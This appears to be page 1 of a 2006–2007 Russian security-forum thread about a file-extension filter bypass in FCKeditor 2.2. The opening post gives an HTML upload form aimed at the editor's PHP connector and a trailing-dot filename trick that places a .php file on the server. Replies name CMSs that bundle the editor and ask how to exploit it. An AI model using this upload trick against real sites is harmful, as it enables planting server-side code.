ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Уязвимость в FCKeditor 2.2
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимость в FCKeditor 2.2
  #1  
Старый 27.02.2006, 13:50
Аватар для censored!
censored!
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
Провел на форуме:
2398258

Репутация: 648


Exclamation Уязвимость в FCKeditor 2.2
Что-то новость прошла незамеченной...

Исследование: NSA Group
Продукт: FCKeditor 2.2
Сайт производителя: http://www.fckeditor.net

Описание:
Возможен обход фильтрации расширений файлов.

Воздействие:
Загрузка запрещённых файлов на целевую систему.

Риск: высокий

Пример:
Код:
<form action="http://host/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/" method="POST" enctype="multipart/form-data"> 
File Upload:
<input id="txtFileUpload" type="file" name="NewFile"> 
<input type="submit" value="Upload"> 
</form>
В конце имени загружаемого файла поставеть символ "." (пример: testfile.php.)

В результате на сервере будет создан файл testfile.php

Решение:
Обратиться на сайт производителя http://www.fckeditor.net
---
Источник: http://www.nsag.ru/vuln/893.html
__________________
+ (это не крестик, это плюсик!)
__________________
 
Ответить с цитированием

  #2  
Старый 27.02.2006, 13:54
Аватар для censored!
censored!
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
Провел на форуме:
2398258

Репутация: 648


Exclamation
p.s. FCKeditor используется во многих CMS:
Drupal
в mamboo-joomla (connector.php там по-моему переименован в php_http_connector.php)
php-nuke
koobi (но там он или переименован либо вырезан (надо смотреть))
__________________
+ (это не крестик, это плюсик!)
__________________
 
Ответить с цитированием

  #3  
Старый 27.02.2006, 21:44
Аватар для podkashey
podkashey
Познавший АНТИЧАТ
Регистрация: 18.06.2005
Сообщений: 1,004
Провел на форуме:
2821162

Репутация: 1320


По умолчанию
Цитата:
Что-то новость прошла незамеченной...
Может уязвимость не особо опасная... Так бы пол рунета накрылось... Хотя я в Cms и тд вообще профан. Знаю только зачем они нужны, как работают и даже общался с одной.
 
Ответить с цитированием

  #4  
Старый 24.11.2006, 12:40
Аватар для Muhacir
Muhacir
Участник форума
Регистрация: 05.10.2006
Сообщений: 133
Провел на форуме:
548338

Репутация: 165
Отправить сообщение для Muhacir с помощью ICQ
По умолчанию
Цитата:
Сообщение от censored!  
p.s. FCKeditor используется во многих CMS:
Drupal
в mamboo-joomla (connector.php там по-моему переименован в php_http_connector.php)
php-nuke
koobi (но там он или переименован либо вырезан (надо смотреть))
Kak W Drupal Zalit Kankretno? Mojesh Obyasnit?
 
Ответить с цитированием

  #5  
Старый 09.02.2007, 09:57
Аватар для Mr_Necromancer
Mr_Necromancer
Новичок
Регистрация: 21.11.2006
Сообщений: 29
Провел на форуме:
90591

Репутация: 33
По умолчанию
Кто-нибудь юзал этот баг? У меня почему-то не получилось его поюзать.
Последний раз редактировалось Mr_Necromancer; 09.02.2007 в 14:16..
 
Ответить с цитированием

  #6  
Старый 09.02.2007, 10:23
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию
стукни в асю.
 
Ответить с цитированием

  #7  
Старый 10.02.2007, 01:10
Аватар для MagNomeTik
MagNomeTik
Познающий
Регистрация: 11.01.2007
Сообщений: 72
Провел на форуме:
538762

Репутация: 102
Отправить сообщение для MagNomeTik с помощью ICQ
По умолчанию
не... баг реально работает... странно что его не заметили..хотя...
 
Ответить с цитированием

  #8  
Старый 10.02.2007, 01:28
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию
Каму надо тот заметил
 
Ответить с цитированием

  #9  
Старый 10.02.2007, 01:51
Аватар для SQLHACK
SQLHACK
Голос разума
Регистрация: 27.09.2006
Сообщений: 529
Провел на форуме:
1607210

Репутация: 1617


Отправить сообщение для SQLHACK с помощью ICQ
По умолчанию
точно , точно заметили, и работает всё
 
Ответить с цитированием

  #10  
Старый 26.04.2007, 06:05
Аватар для Ксю
Ксю
Новичок
Регистрация: 11.04.2007
Сообщений: 1
Провел на форуме:
4732

Репутация: 0
По умолчанию
Опишите поподробнее уязвимость. В какую папку будет залит файл? У меня нифига не получилось
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Уязвимость WMF- просто очередная недоработка программного кода Windows dinar_007 Мировые новости 0 19.01.2006 03:26
Есть ли уязвимость в форумах созданных на http://www.1bb.ru/ ? bike Форумы 2 24.12.2005 17:28
Уязвимость WZC в Windows XP DRON-ANARCHY Мировые новости 5 10.10.2005 23:16
Очередная уязвимость в браузре Internet Explorer DRON-ANARCHY Мировые новости 0 02.10.2005 22:28
Открытие файлов и внешние данные. Потенциальная уязвимость php-скриптов k00p3r Чужие Статьи 1 11.07.2005 19:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ